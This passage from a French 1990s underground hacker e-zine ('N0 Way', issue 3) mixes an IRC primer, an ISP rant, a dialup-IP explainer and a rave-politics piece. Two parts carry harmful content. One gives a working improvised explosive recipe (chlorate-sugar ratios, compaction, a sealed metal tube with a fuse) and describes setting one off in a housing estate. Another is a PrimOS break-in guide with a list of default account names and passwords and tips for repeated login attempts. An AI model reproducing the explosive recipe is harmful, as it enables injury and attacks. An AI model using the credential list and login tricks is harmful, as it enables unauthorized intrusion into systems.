  3788. La pluspart du temps vous ne trouverez personne d'interessant au premier abord
  3789. sur #hack.  Mais de nombreuses personnes interressantes y passent souvent.
  3790. Donc la premiere impression de conneries inutiles n'est pas forcemment vraie
  3791. pour tout le monde.
  3792.  
  3793. Comment se connecter sur IRC?
  3794. - - - - - - - - - - - - - - -
  3795.         Eh bien tout d'abord il vous faut un client IRC que vous compilerez
  3796. pour votre unix (si vous avez un PC sous SLIP et PPP, il vous faudra chercher
  3797. un client IRC pour PC).  Ensuite, vous devrez trouver un serveur IRC qui
  3798. marche dans votre coins (pas trop loin dans le reseau) et qui vous accepte en
  3799. tant que connecte.  Si vous prenez un serveur irc trop loin (comptez la
  3800. "distance" avec traceroute), vous aurez des delais dans votre dialogue.
  3801. Il vous faut aussi et bien sur un acces Internet.
  3802. Une fois que vous aurez fixé tout cela, vous pourrez vous connecter sur IRC.
  3803.  
  3804. Comment utiliser?
  3805. - - - - - - - - -
  3806.         Les commandes IRC sont assez simple.  Je vous conseille de prendre un
  3807. client IRC II car ils permettent vraiment des choses tres cool. Ils vous
  3808. permettent par exemple de faire du transfert de fichier avec quelqu'un en
  3809. restant connecte sur le chat et en continuant de discuter.
  3810. On change son nickname (pseudo) avec: /NICK <nouveau nickname>
  3811. On va dans un channel en faisant: /join #<nom du channel>
  3812. Les noms de channels commencent toujours par #
  3813. On quitte un channel en faisait: /leave <channel>
  3814. On sort du client en faisant: /exit
  3815. On envoie un message prive non securise à quelqu'un: /msg <nickname> <message>
  3816. On regarde qui il y a dans le channel avec: /who #<channel>
  3817. voila les commandes de base.
  3818.  
  3819. Explication du fonctionnement du reseau IRC.
  3820. - - - - - - - - - - - - - - - - - - - - - -
  3821.         On utilise l'IRC avec un client qui se connecte à un serveur IRC.
  3822. Ce serveur IRC est connecte à d'autres serveurs IRC.  Ainsi, il y a un traffic
  3823. moins important car l'information est distribuee sur les serveurs IRC. Si
  3824. chacun choisit un serveur IRC proche de chez lui (pas beaucoup de internet hop,
  3825. les saut de puces que l'on voit avec traceroute), les liaisons internationales
  3826. ne seront utilisées que par les serveurs et donc pas de gaspillage!
  3827.  
  3828. Ainsi on aura:
  3829.                      Client      Client Client
  3830.           Client__     |            `\   |
  3831.                  `\    |             `\  |
  3832.                   `\   |              `\ |
  3833.           Client----IrcServ3==========IrcServ4=====IrcServ5-----Client
  3834.                        ||                               \
  3835.                        ||                                 \
  3836.                        ||                                   \
  3837.           Client----IrcServ2==========IrcServ1            Client
  3838.                        |                  |
  3839.                        |                  |
  3840.                      Client            Client
  3841.  
  3842. Si il y une coupure reseau entre IrcServ1 et IrcServ2 le user connecte sur
  3843. IrcServ1 n'aura plus qu'a quitter et revenir dans le channel en question et
  3844. des a present il aura les chanops sur le reseau car IrcServ1 croit alors qu'il
  3845. est tout seul dans le reseau puisqu'il ne voit pas les autres au dela de la
  3846. coupure reseau (que l'on appelle netsplit).
  3847.  Ainsi, des que la connection entre IrcServ 1 et 2 reviendra, le Client de
  3848. IrcServ 1 sera chanop et le restera : il sera devenu chanops.
  3849. Donc le jeu est pour certain de devenir chanop et de faire "tomber" la liaison
  3850. entre son serveur local et le serveur qui fournit le feed IRC a son serveur
  3851. local.   Je sais, c'est vicieux mais a la fin ca n'a plus d'interet tant c'est
  3852. commun sur Irc.
  3853.  
  3854.         Au niveau des chanops, il faut savoir que le premier qui se connecte
  3855. dans un channel deviens automatiquement le maitre du channel avec ses chanops.
  3856. Il peut ainsi:
  3857. - ejecter quelqu'un du channel (/kick <nickname>)
  3858. - modifier le sujet (topic) du channel (/topic #<channel> <new topic>)
  3859. - rendre operateur quelqu'un d'autre (/mode +o <nickname>)
  3860. - enlever l'operateur à quelqu'un (/mode -o <nickname>)
  3861. - modifier les droits d'acces au channel (on peut banir du channel certainnes
  3862.   personnes, certainnes adresses etc...)
  3863.  
  3864. Quelques conseils:
  3865. - - - - - - - - -
  3866.         Ne tapez pas tout ce que l'on vous dit de taper et surtout ne tapez
  3867. pas des trucs du style /ON ou /EXEC car si vous etes sous Unix, cela vous fera
  3868. executer des choses qui peuvent être des backdoor pour revenir sur votre suite
  3869. ensuite.
  3870.         Evitez de faire chier les personnes avec un @ devant leur nom, ce sont
  3871. les chanops!
  3872.         Avant d'utiliser un script Irc II que l'on vous envoie, verifiez bien
  3873. qu'il ne contient pas de backdoor!
  3874.  
  3875. Voila !
  3876. - - - -
  3877.         Vous voila prêt pour aborder l'IRC sans difficulté!  Attention, on
  3878. devient vite accro a ce service de l'internet.
  3879. Peut etre demanderez vous un jour en vous debranchant de votre NeuroPrise (tm)
  3880. "y a t'il une vie après l'IRC?"
  3881.  
  3882.                                                         ++NeurAlien.
  3883.  
  3884.                         | Internet for the masses |
  3885.  
  3886.         La France était (JE DIS BIEN ETAIT) sérieusement dans la merde car
  3887. aucun acces public à l'Internet n'était disponible à des prix abordables.
  3888. Bien sur il y avait des passes droits accordés à certains privilégié qui
  3889. bénéficiaient de l'acces d'un université ou d'un institut pour utiliser
  3890. Internet.
  3891.  
  3892.         Depuis quelques mois, il semble que tout ait un peu changé.
  3893. Il est apparu d'abord des services minitels proposant mail et news.  Bien sur,
  3894. ce genre de service est une vraie arnaque car il ne fournit pas quelque chose
  3895. d'agréable (vous avez deja les news a 1200/75 bauds????).  De plus, ils se
  3896. sont avere de qualité assez médiocre.  Pour n'en citer que quelques uns, ya
  3897. TEASER et sa floppée de services parallèle destiné à se faire du fric sans se
  3898. préocupper des connectés (Sniifff Sniiff... mais oui, je reconnais cette odeur
  3899. de pourriture... mais c'est... c'est.... c'est J.. et C...) et les services
  3900. EMAIL, INTERNET etc...
  3901.  
  3902.         Ensuite ya des trucs largement plus serieux qui se sont monté.  On a
  3903. tout d'abord entendu parler de boites qui voulaient faire du dialup IP.
  3904. Ma première réaction a été:
  3905. "Et merde, ca y est, encore des arnaqueurs qui viennent squatter une de ces
  3906. derniere place de liberté qu'est l'Internet".
  3907.  
  3908.         Alors on a vu apparaitre en premier un truc appelé World-Net. Ne
  3909. voulant pas juger à la légère, j'ai demandé des infos et voila:
  3910. 80 F de l'heure pour le Full IP (FTP, Telnet, Mosaic etc...)
  3911. 40 F de l'heure pour le Mail, News et IRC.
  3912. Je me suis dit:
  3913. "arghhh... putain c'est cher"
  3914. Et quelle connerie j'ai dit la, j'avais pas vu ce qui suivait.
  3915. Au mois de Juin et Juillet d'autres boites se sont fait connaitre:
  3916. >FranceNet qui fait passer son service pour de l'internet alors que c'est juste
  3917. un BBS connecté à l'internet qui ne permet pas de faire reellement du Dialup
  3918. IP, bref, c'est vraiment pour le con moyen qui sait pas se servir de son
  3919. clavier. En plus c'est hyper cher (36 68) et ca fonctionne très mal!
  3920. >Calvanet : alors la c'est une arnaque incroyable... meme pas la peine d'en
  3921. parler.  C'est la pourriture Calvacom revue et corrigee pour Internet.
  3922. >France Telecom et leur service internet: si vous avez plus de 10 000 F par
  3923. mois a mettre dans une liaison qui n'est meme pas permanent pour ce prix la,
  3924. vous pouvez toujours tenter.
  3925. J'ai rarement vu une boite qui ait le culot de faire cela quand meme!  C'est
  3926. une honte !
  3927.  
  3928. Bref, dans les 4 fournisseurs World-Net, francenet, calvanet et l'offre FT,
  3929. c'est bien WorldNet qui est le moins cher.
  3930.  
  3931. Alors je recapitule les infos que j'ai eu sur eux (worldnet):
  3932. >Pas d'abonnement.
  3933. >Pour le Full IP : 80 F HT / heure
  3934. >Pour le Mail, News et IRC: 40 F / heure
  3935. pas d'autre frais.  pas de frais à la mise en place.  Ils peuvent fournir un
  3936. package de communication pour PC ou Mac.
  3937.  
  3938. Bref... c'est pas les prix fabuleux qu'on pourrais avoir aux US mais c'est
  3939. pas mal quand meme.
  3940.  
  3941. Voila, j'espere que ca vous évitera de vous faire pieger.  J'ai des potes
  3942. pourtant pas trop naze qui se sont fait pieger par les arnaqueurs de
  3943. Francenet.  Ca semble ne rien couter car c'est en 36 68 (2.19F / minute) et
  3944. quand tu recois la facture FT, il est deja trop tard !
  3945.  
  3946. Amusez vous bien avec Internet.                         ++NeurAlien.
  3947.  
  3948. P.S: J'ai une information tres tres tres interressante.
  3949.      WorldNet fait une "semaine Worldnet" avec Internet gratuit pour n'importe
  3950.      qui le demandant. C'est trop cool.  Je me rappelle plus de la date mais
  3951.      ils ont un service qui informe la dessus, c'est le 3615 Worldnet ou le
  3952.      3617 SCT je crois.
  3953.      Je met les coordonnées de téléphone de cette boite:
  3954.      Tel: (1) 60 20 85 14
  3955.      Hehe... moi c'est sur, je vais demander un compte pour ce truc !
  3956.  
  3957. Disclaimer:
  3958.         J'en ai rien a foutre si mes propos font chier certainnes des boites
  3959.         mentionnées (francenet, WorldNet, Calvanet, France Telecom, teaser
  3960.         etc...).  Ce que j'ai dit est vrai et si ca vous plait pas vous avez
  3961.         qu'a être honnètes vous aussi.  Je ne suis pas un politicien donc j'en
  3962.         ai rien a cirer de l'avis des pseudo-VIP, je suis pas journaliste et
  3963.         ceci n'est pas un journal alors les proces en diffamations vous pouvez
  3964.         vous les mettre ou je pense.
  3965.         A bon entendeur salut!                          ++NeurAlien.
  3966.  
  3967.                               | Dialup IP |
  3968.  
  3969.         Vous entendez parler partout de Dialup IP et vous ne savez pas ce que
  3970. ca veut dire.  Cette partie est sensée vous expliker cela!
  3971.  
  3972.         Dans le temps, avant qu'Internet soit populaire, un vieux système
  3973. appelé UUCP permettait de recevoir son mail et ses news par "à coups" car il
  3974. fallait aller chercher ses informations sur le serveur et consulter en local.
  3975.  
  3976.         Ensuite on a vu apparaitre pour les privilégié des accès shell sur des
  3977. becannes reliées à l'Internet. A partir de la, on avait un terminal qui
  3978. permettait d'utiliser tous les outils d'Unix pour se connecter sur l'Internet:
  3979. telnet, FTP, IRC, gopher.  Mais ca s'est vite trouvé dépassé.  Par exemple, le
  3980. World Wide Websted (WWW) qui est un ensemble de serveurs multimédias reliés
  3981. par des liens hypertexte et qui fonctionne en reseau ne peut fonctionner
  3982. qu'avec un terminal ayant des capacite graphiques et sonores. Ce que
  3983. generalement les terminaux n'ont pas!
  3984.  
  3985.         Bref, il a fallu s'adapter, c'est pour cela que le SLIP puis le PPP
  3986. ont été créé.  Au lieu de se connecter avec un émulateur de terminal sur un
  3987. unix et de converser avec un Shell, la politique du SLIP & PPP est de
  3988. transformer le flux de paquet venant de l'Internet en quelque chose que l'on
  3989. peut passer sur le lien série du modem.
  3990.  
  3991.         Donc PPP et SLIP servent à émuler en fait une liaison TCP/IP
  3992. (protocole Internet) sur une communication modem.  Bien sur, cette liaison
  3993. n'est pas permanente.
  3994.  
  3995.         Ainsi, on considère la machine de l'utilisateur comme un noeud
  3996. temporaire d'un reseau connecté à Internet.  Cette machine (qui peut être la
  3997. votre) possède donc sa propre adresse.  Il faut pour gerer ce flux de paquet
  3998. qui transite à travers le modem un "Client" PPP ou SLIP qui retransforme ca en
  3999. quelque chose d'exploitable par les "Clients" IRC, Mosaic (pour le WWW),
  4000. Telnet, FTP, Gopher, Mail, News.
  4001. (Le terme client désigne un programme qui va traiter l'information dispensée
  4002. par un serveur centralisé).
  4003.  
  4004.         Avec PPP et SLIP vous pouvez envoyer vos propre paquet. C'est un peu
  4005. comme la victoire du combat qui se déroule sur le cable TV.
  4006. Les grosses compagnies veulent un système peu interactif qui permettra
  4007. seulement d'acheter avec son numéro de CB des programmes à la télé.
  4008. Les cyberpunks veulent un truc totalement interactif qui permet de proposer
  4009. soi même ses propres service.  SLIP et PPP vous permettent de proposer vos
  4010. propres services à l'ensemble du monde.  Bien sur ces services sont
  4011. accessibles uniquement quand vous etes connecté.
  4012.  
  4013.         Exemple pratique: emulation SLIP sous Windows.
  4014. Vous avez un PC.
  4015. Vous avez un modem 9600 minimum (19200 ou 28800 c'est le reve!).
  4016. Vous avez les logiciels Trumpet et WinSock.
  4017. Vous avez les clients Mail (Eudora), News, Mosaic, FTP etc...
  4018.  
  4019. Trumpet est le logiciel qui vous permet de vous connecter à un service vous
  4020. fournissant du SLIP.
  4021. WinSock permet d'émuler les sockets ("systeme de communication d'Internet"
  4022. (c'est pas exactement ca)) sous Windows.
  4023. Les clients exploitent les infos transmises par Trumpet puis WinSock.
  4024.  
  4025. schéma:
  4026.  
  4027.                          ____________________________________________
  4028.                         | Client | Client | Client | Client | Client |
  4029.                         | Mail   | FTP    | Mosaic | News   | Irc    |
  4030.                         |(eudora)|        |        |        |        |
  4031.                         |--------+--------+--------+--------+--------|
  4032.                         |                                            |
  4033.                         |                 WinSock                    |
  4034.                         | ( transforme les infos fournie par Trumpet |
  4035.                         |   en sockets exploitable par les clients ) |
  4036.                         |--------------------------------------------|
  4037.                         |                                            |
  4038.                         |                 Trumpett                   |
  4039.                         | ( assure la cnx SLIP et la reception des   |
  4040.                         |  paquets TCP/IP )                          |
  4041.                         |--------------------------------------------|
  4042.                         |                                            |
  4043.                         |                couche Hard                 |
  4044.                         |        communication modem en série        |
  4045.                         |                                            |
  4046.                          --------------------------------------------
  4047.  
  4048.         L'avantage avec ce système est que l'on peut utiliser plusieurs
  4049. clients en même temps: FTP, News et Mosaic par exemple.
  4050.  
  4051.         C'est TRES TRES pratique.
  4052.  
  4053. Eh bien c'est sur ces mots que je referme la section "du coté d'internet".
  4054.  
  4055.                            ++NeurAlien
  4056.  
  4057.  
  4058.                                -%!% N0 Way %!%-
  4059.  
  4060.                       Volume I,   Numéro 3,  Partie 3.14
  4061.  
  4062.  
  4063. [ Petite précision sur les explosifs:
  4064. Ce que je vais dire, tout le monde le sais: Les explosifs sont TRES dangereux.
  4065. Mais bon, on se dit: ouais, je vais assurer etc... mais ca c'est du N'IMPORTE
  4066. QUOI !  On ne maitrise jamais totalement ce genre de produit (même les
  4067. artificiers professionels).
  4068. Un explosif amateur a un probleme:  il n'est presque jamais stable, par contre
  4069. il est en général aussi fort que les explosifs professionels. Donc, il faut que
  4070. vous sachiez que chaque année il y a entre 10 et 100 gosse qui garderont a vie
  4071. des sequels de ce genre de connerie. (j'ai un ami qui doit tout le temps porter
  4072. des gants car sinon c'est vraiment pas beau!).
  4073. DECONNEZ PAS, faites vos mélanges en petite quantité et n'oubliez pas:
  4074. ce genre de mélange peut être MORTEL !      ++NeurAlien.]
  4075. -----------
  4076.  
  4077.                          L'explosif ? tient tient...
  4078.  
  4079.  
  4080. Ce jour la j'etais sceptique, on m'avait dit qu'un simple melange de sucre et de
  4081. desherbant (chlorate de soude) suffisait a faire de l'explosif. Au fait, sur les
  4082. paquet  de  petards,  vous n' avez  vous jamais  lu 'Ne contient ni chlorate, ni
  4083. perchlorate' ? La tentation fut forte, et j'achetais le jour suivant les
  4084. ingredients...
  4085.  
  4086. Premiere  preparation,  quelques  grammes,  moitier  sucre,  moitier  chlorate.
  4087. J'allume. Stupefaction,  ca  brulait tres vivement, une flamme jaune extremement
  4088. lumineuse,  pendant  quelques  secondes,  en  meme  temps ca degageait une fumee
  4089. blanche tres epaisse avec une odeur de caramel.  (la decomposition spectrale est
  4090. en fait celle du sodium, 2 raies jaunes). Le  melange a l'etat brute ne fait que
  4091. bruler a l'air libre. On dit que le compose fuse.
  4092.  
  4093. Pour  l'utiliser  en  explosif il fallait donc enfermer le melange dans un tube.
  4094. J'avais  confectionne  un  tube  ouvert  d'un cote, et que l'on pouvait ferme de
  4095. l'autre. J' y  mettais  dedans les celebres Mammouths. Du cote ouvert on pouvait
  4096. placer  un  projectile  qui  entrait dans le tube. Lorsque le petard claquait le
  4097. projectile ( ecrou + boulon qui bouchait bien l'entree )  etait expulse avec une
  4098. force  suffisante  pour percer une plaque de fer de 1/2 mm d'epaisseur. Bien sur
  4099. il me fallut peu de temps pour remplacer  les  Mammouths par le melange. J'avais
  4100. tasse au fond  du  tube une epaisseur de peut etre 5mm. Un trou dans  le fond du
  4101. tube  laissait  passer  une  meche  de  petard, ce qui declancherais l'explosion
  4102. J'essaie.  La  detonnation  fut  sourde et grave,  on sentait l'onde de choc. Le
  4103. fond  du  tube etait  finalement eventre, decapite et plie en arcordeon rien qu'
  4104. avec la force du recule du tube lorsqu'il cogna dans un mur. Surpennant, avec si
  4105. peu de poudre...
  4106.  
  4107. Afin  de  perfectionner  l'explosif, je fit quelques recherches. Meme le prof de
  4108. physique s'y etait mis ! Un sacre lascar du Cnrs d'ailleurs.
  4109.  
  4110. En voici les resultats:
  4111.  
  4112. Les  meilleurs  performances  sont  obtenues en melangeant 2/3 de sucre glace et
  4113. 1/3  de chlorate en poids. Pour afiner les rapports il suffit de regarder ce qui
  4114. reste  apres que l'on est fait fuser le melange: Reste du rose coulant -> un peu
  4115. trop  de  chlorate.  Reste noir bousoufle -> trop de sucre. Ce melange augemente
  4116. ces  performances  lorsqu'il  est humide au toucher. Il ne doit surtout pas etre
  4117. coulant.  Il  ne  craint donc absolument pas l'humidite, au contraire. Le fin du
  4118. fin  c'est de combiner de l'huile de vaseline. (Quasiment tous les explosifs pro
  4119. contiennent  de  l'huile  de  vaseline,  mais  cette  operation  est  delicate a
  4120. realiser).  Plus  le  melange est tasse plus ca pete fort. Ceci est en fait tres
  4121. important.  Apres  l'avoir  tasse,  ca  doit  etre un bloque dur. Pour le faire,
  4122. n'utilisez  pas  d'etau, de pinces etc..!!!! Ca vous peterait a la gueule, avant
  4123. meme d'avoir dit 'ouf..'
  4124.  
  4125. Il  est important  de  remarquer que le melange fuse a partir de 50 degre C ! Le
  4126. melange  est tellement  instable,  qu'il  n'y a pas besoin de flamme pour que ca
  4127. demarre.  Ceci  explique  aussi  pourquoi  il  est  sensible  aux chocs (le choc
  4128. provoque  un  petit  echauffement en un point, meme tres faible), donc attention
  4129. !!! pas de brutalite. Enfin le melange devient de plus en plus instable au cours
  4130. du temps s'il est tasse. Apres 24h, ca devient dangereux et risque de bruler (ou
  4131. peter)  tout  seul.  On  utilise au fur et a mesure qu'on fabrique. Une solution
  4132. pour  en  garder  consiste  a  humudifier  le  melange,  et  le  stocker dans un
  4133. congelateur a -18 deg. Mais mieux vaut l'eviter si on peut.
  4134.  
  4135. Apres  la  parfaite maitrise, je confectionnais un gros petard, avec 100 grammes
  4136. de  melange  tasse  dans  un bout de cadre de velo decoupe et ferme au bout a la
  4137. presse  prealablement percer pour laisser passer une meche. -----> Ne percer pas
  4138. apres  avoir  mis  le  melange  et  fo prendre la precaution de mettre du papier
  4139. mouchoir  ou  Wc  au  bout  du  tube,  afin d'etre sur que l'on ne presse pas le
  4140. melange !!!!!!!!  Operation termine, je vais a la ZUP, ou les petards n'inquiete
  4141. depuis  longtemps plus personne et ou la police ne vient pas. Je le pose sur une
  4142. plaque en beton des telecoms. J'allume la meche et je me retire mine de rien. De
  4143. toute  ma  vie  je  n'ai  jamais  entendu  une  telle detonnation ! Ce n'est pas
  4144. comparable, si bien qu'il m'ai tres difficile de la decrire. A entendre le bruit
  4145. j'ai  pense  que  les  plaques  de  beton  de largement plus de 100kg et de 10cm
  4146. d'epaisseur  etait  integralement pulverisees. C'est une detonnation qui ne fait
  4147. pas  mal  aux  oreilles. C'est un bruit tres puissant, tres sourd et tres grave,
  4148. un peu comme un coup de tonner ne fait pas mal aux oreilles. C'etait encore plus
  4149. grave,  et  certainement  10 fois plus forts ! Je crois qu'on arrive pas a se le
  4150. representer. Mais surtout ne vous bouche pas les oreilles ! Apres la detonnation
  4151. une  grande  fumee  blanche se dissipa. Imaginer la tete des gens, on pense a un
  4152. attentat.  D'ailleurs  dans  la  minute  qui  suivit la detonnation personne n'a
  4153. ouvert la fenetre. L'onde de choc n'a heuresement pas brisee de vitres.
  4154.  
  4155.  
  4156. C'est  ensuite  seulement  qu'on  se  dit,  j'ai pris ca dans les mains, je l'ai
  4157. transporte dans un sac en plastique (jamais ds les poches), mais j'ai ete dingue
  4158. Vraiment  si  on  s'imaginait  la  force que ca peut avoir, personne n'aurait le
  4159. courage  d'en faire, et de loin ! On c'est bien marre, on a fait du 0 erreur, on
  4160. a  eu  beaucoup de chance, tout simplement. Se ne sont pas des choses qu'il faut
  4161. refaire a tour de bras. Faut etre raisonnable et lucide, a vous de voir.
  4162.  
  4163.  
  4164.                                            A bon entendeur, salut !...      
  4165.                                                  By Inlandsis.
  4166.  
  4167.  
  4168.                                -%!% N0 Way %!%-
  4169.  
  4170.                       Volume I,   Numéro 3,  Partie 3.15
  4171.  
  4172.  
  4173. Cet article est un article de CORE-DUMP, journal Underground Hacker jamais
  4174. diffuse publiquement.
  4175. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  4176. = CORE-DUMP    Issue 1        Phile 3        [NeurAlien]     13/01/92   =
  4177. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  4178.  
  4179.               /@@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@\
  4180.               @/                                \@
  4181.               @  Prime & the PrimOS Environment  @
  4182.               @                                  @
  4183.               @               par         @
  4184.               @                                  @
  4185.                       @            NeurAlien             @
  4186.               @\                                /@
  4187.               \@@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@/
  4188.  
  4189.  
  4190.   Le Prime est un ordinateur a mi-chemin entre le gros ordinateur de
  4191. traitement lourd et l'ordinateur de gestion de conception plus legere.
  4192. Son systeme d'exploitation s'appelle le PrimOS et est un systeme proprietaire.
  4193. Il est multi-utilisateur et possede plusieurs modules des l'origine:
  4194. un module Basic, un autre de programmation pseudo-shell (batch) etc...
  4195. Le prime possede de nombreuses failles de securite. Notemment dans le
  4196. programme tour.
  4197.  
  4198.   >L'acces au Prime:
  4199.   =================
  4200. L'acces au Prime se fait par une base d'acces d'où l'on peut lancer des
  4201. commandes de pre-login appelee PrimeNet. C'est en fait comme un service
  4202. d'accueil et de dispatching avec une machine par defaut.
  4203. Les prompts utilisé par le système de prélogin sont 'OK' et 'ER!'.
  4204. 'OK' est affiché en premier, si vous tapez quelque chose d'incorrect, le Prime
  4205. vous répondra par un 'ER!'.
  4206. La bannière ressemble a :
  4207. "Primenet V2.3"
  4208. Un message souvent vu sur Prime est:
  4209. Please Login
  4210. ER!
  4211.  
  4212. Cela veut dire que vous vous etes plante dans la commande et qu'il faut taper
  4213. login:
  4214.  
  4215. Primenet V 2.3 (system)
  4216. LOGIN<CR>      (vous)
  4217. User id?       (system)
  4218. AA1234         (vous)
  4219. Password?      (system)
  4220. KILLME         (vous)
  4221. OK,            (system)
  4222.  
  4223. La principale commande etant bien sûr login.
  4224. syntaxe: login [<user>] [<password>] [-ON <host>] [-PROJECT <project_id>]
  4225. Le nom user est ecrit en majuscule comme la pluspart des commandes en PrimOS
  4226. d'ailleur. Une fonction interressante de PrimeNet est de pouvoir se logger
  4227. sur une machine autre que celle par defaut sans pour autant avoir a se logger
  4228. sur la machine par defaut.
  4229.  
  4230. Il vaut mieux essayer plusieurs logins par la commande
  4231. login <user> <password>
  4232. comme ca vous avez 3 essais au lieu d'un essai.
  4233.  
  4234.   >Le systeme d'exploitation du Prime, PrimOS:
  4235.   ===========================================
  4236. La version actuelle de PrimOS doit etre la 22 ou la 23.
  4237.  
  4238.   >Les commandes d'utilisation courante du systeme:
  4239.   ================================================
  4240. status users    \_    : Affiche la liste des users, leur origine, leur etat
  4241.        us       /
  4242.        all    \_    : Affiche des infos sur toutes les activites du
  4243.        al    /      systeme
  4244.        comm        : decrit les controlleurs de communication et leurs
  4245.               etats respectifs.
  4246.        devices        : donne des informations sur les peripheriques
  4247.        disks    \_    : donne des informations sur les disques
  4248.        di    /
  4249.        me        : donne des infos sur soi meme.
  4250.        network    \_    : donne des infos sur les differents noeuds du reseau
  4251.        net    /      PrimeNet.
  4252.        project    \_    : donne des infos sur les projets sur users
  4253.        pro    /
  4254.        system    \_    : donne des infos sur le PrimOS en train de tourner.
  4255.        sys    /
  4256.        semaphores  \_    : donnes des infos sur les semaphores actives
  4257.        se       /
  4258.        units    \_    : donne des infos sur les units ouverts
  4259.        un    /
  4260.  
  4261. listf    \_        : donne le nom du dir, le peripherique et si on a des
  4262. l    /          ACLs dessus ou non.
  4263.  
  4264. slist <pathname>    : affiche le fichier a l'ecran
  4265.  
  4266. login [<user>] [<password>] [-ON <host>] [-PROJET <projet_id>]
  4267.             : ouvre un log sur la machine specifiee ou definie par
  4268.               defaut avec le password et le projet specifie ou par
  4269.               defaut.
  4270.  
  4271. date            : affiche la date et l'heure
  4272.  
  4273. time            : affiche les valeurs du registre de temps partage:
  4274.               . connect time    : temps depuis le login
  4275.               . compute time    : temps d'utilisation de
  4276.                           programmes
  4277.               . I/O            : temps d'utilisation d'un
  4278.                           Disk, Controlleur de comm ou
  4279.                           Device.
  4280.  
  4281.  
  4282.   >Les communications:
  4283.   ===================
  4284. Les communications x25 se font par l'intermediaire de netlink qui est un
  4285. programme de communication.
  4286. on l'appelle comme suit:
  4287. netlink<cr>
  4288. Ce programme est en fait un sous systeme. Il vous reponds alors le prompt '>'.
  4289. Ici vous pouvez tapper diverses commandes:
  4290. c <DNIC>:<NUA>            : appelle en collective call le NUA
  4291. nc <DNIC>:<NUA>            : appelle normalement le NUA
  4292.  
  4293.   >Les logins par defaut:
  4294.   ======================
  4295. User ids:                     Passwords:
  4296. ---------                     ----------
  4297. Admin
  4298. Games
  4299. Tools
  4300. Rje
  4301. Netman
  4302. Cmdnco
  4303. Demo
  4304. Regist
  4305. Prirun
  4306. Telenet
  4307. mail                          mail
  4308. prime                         prime / primos
  4309. primos_cs                     prime / primos
  4310. Primos
  4311. primenet                      primnet
  4312. mfd                           mfd
  4313. fam                           fam      /  Ver. 18 Primos   \
  4314. system                        system  <    et en dessous    >
  4315. dos                           dos      \     ---------     /
  4316. tele                          tele
  4317. netlink                       netlink
  4318. test                          test
  4319. guest                         guest
  4320. guest1                        guest1/guest
  4321.  
  4322.   >le mot de la fin:
  4323.   =================
  4324. Ya pas mal de système Prime qui sont encore TRES ouverts à tout type de
  4325. pénétrations (hahaha).  Alors pour les bons petits PADs tranquile, c'est kewl!
  4326. NeurAlien.
  4327. ------------------
  4328.                          S0, G0 0N wif N0 Way !
  4329.  
  4330.  
  4331.                                -%!% N0 Way %!%-
  4332.  
  4333.                       Volume I,   Numéro 3,  Partie 3.16
  4334.  
  4335.  
  4336.                     <<</\[..]/\[..]/\[..]/\[..]/\[..]/\>>>
  4337.                     </'                                `\>
  4338.                     <\          Rave    Revolt          />
  4339.                     <\                                  \>
  4340.                     <<</\[..]/\[..]/\[..]/\[..]/\[..]/\>>>
  4341.  
  4342.                                       -
  4343.                                    PART  I
  4344.                                       -
  4345.  
  4346.         Arggghhhhhhh!!!!!   C'est le cri de la bete qui se reveille!
  4347.  
  4348. NON, je n'y crois pas, ce que je redoutais est arrivé: ce havre de repos
  4349. qu'etait le pont de Tolbiac a ete violé.  Le sanctuaire a été profané par de
  4350. sales CRS baveux et grognants avides de baston.  C'est vraiment le genre de
  4351. trucs qui m'ecoeurent: ils sont venus faire chier gratuitement des ravers
  4352. simplement car c'était pas déclaré.  Encore cet enculé de Pasqua qui s'est
  4353. dit: "Hey merde, ils s'amusent bien là bas et ils sont pas emmerdés par les
  4354. flics car ils ne gênent personne".
  4355.  
  4356. Solution: hop, on se renseigne avec les RG et autres enculés civils puis on
  4357. leur envoie les CRS.
  4358.  
  4359. Bravo pour les méthodes... C'est d'une finesse....
  4360.  
  4361. Alors maintenant qu'ils ont fini de faire chier les raves ils commencent a
  4362. déranger les afters: RI-DI-CULES !
  4363.  
  4364. Il paraitrait même qu'il est question d'interdire les raves au plan national.
  4365. La va falloir se secouer car les raisonnements précédents ne peuvent plus
  4366. s'appliquer: on pensait que l'interdictions des raves commerciales permettrait
  4367. à l'underground de se developper.  Que nenni, ils s'attaquent directement à
  4368. l'underground!
  4369.  
  4370. Quelle sera la prochaine étape?
  4371.  
  4372.                           L'interdiction de TNT?
  4373.                 L'arrestation des organisateurs des raves?
  4374.                 (ca serait pas un mal pour E+ et d'autres...)
  4375.  
  4376.         Il va falloir réagir contre toutes ces poussées sécuritaires et anti-
  4377. démocratiques.  Nous y contribuons déja en diffusant No Way un peu partout!
  4378.  
  4379.                                    -
  4380.                                 PART II
  4381.                                    -
  4382.  
  4383.         Le Teknival UFO 23 du massif central a lui aussi été gèné par les keufs
  4384. une nouvelle fois.
  4385.  
  4386.         Au début, tout se passait bien: le Teknival avait été installé dans un
  4387. champ prèté aux organisateurs  par un agriculteur du coins.
  4388.  
  4389.         Tout se passait bien, a des kilometres des habitations.  Pourtant, il y
  4390. a eu DES PLAINTES.  Les gendarmes venaient à l'entrée du champs presque tous
  4391. les jours pour se renseigner auprès des organisateurs.  Le maire voulait virer
  4392. le teknival de sa commune.  Le maire biensur n'y est pas arrivé.  Ils ont donc
  4393. transmis l'affaire au prefet etc...   Bref, comment faire chier pour rien les
  4394. ravers qui ne génaient personne.
  4395.  
  4396.         On se balade dans le Teknival, a la recherche de bois pour le feu ou de
  4397. feu pour nos têtes ;) et à chaque fois on entendait:
  4398. "Il parait qu'ils vont envoyer les CRS".
  4399.  
  4400.         De charge de CRS, il n'y en a pas eu (a ma connaissance), par contre
  4401. ces personnes mal avisées se sotn permise de filtrer à la fin du Teknival
  4402. l'entrée au champ, ne laissant pas entrer les gens mais les laissant sortir.
  4403. Le champs s'est ainsi "vidé" au fur et à mesur des voyages.
  4404.  
  4405.         La même éternelle question se pose encore,
  4406.  
  4407.                         Mais que veulent ils?
  4408.                                                                         ++N.
  4409.  
  4410.                                -%!% N0 Way %!%-
  4411.  
  4412.                       Volume I,   Numéro 3,  Partie 3.17
  4413.  
  4414.  
  4415. Cet article est un article de CORE-DUMP, journal Underground Hacker jamais
  4416. diffuse publiquement.
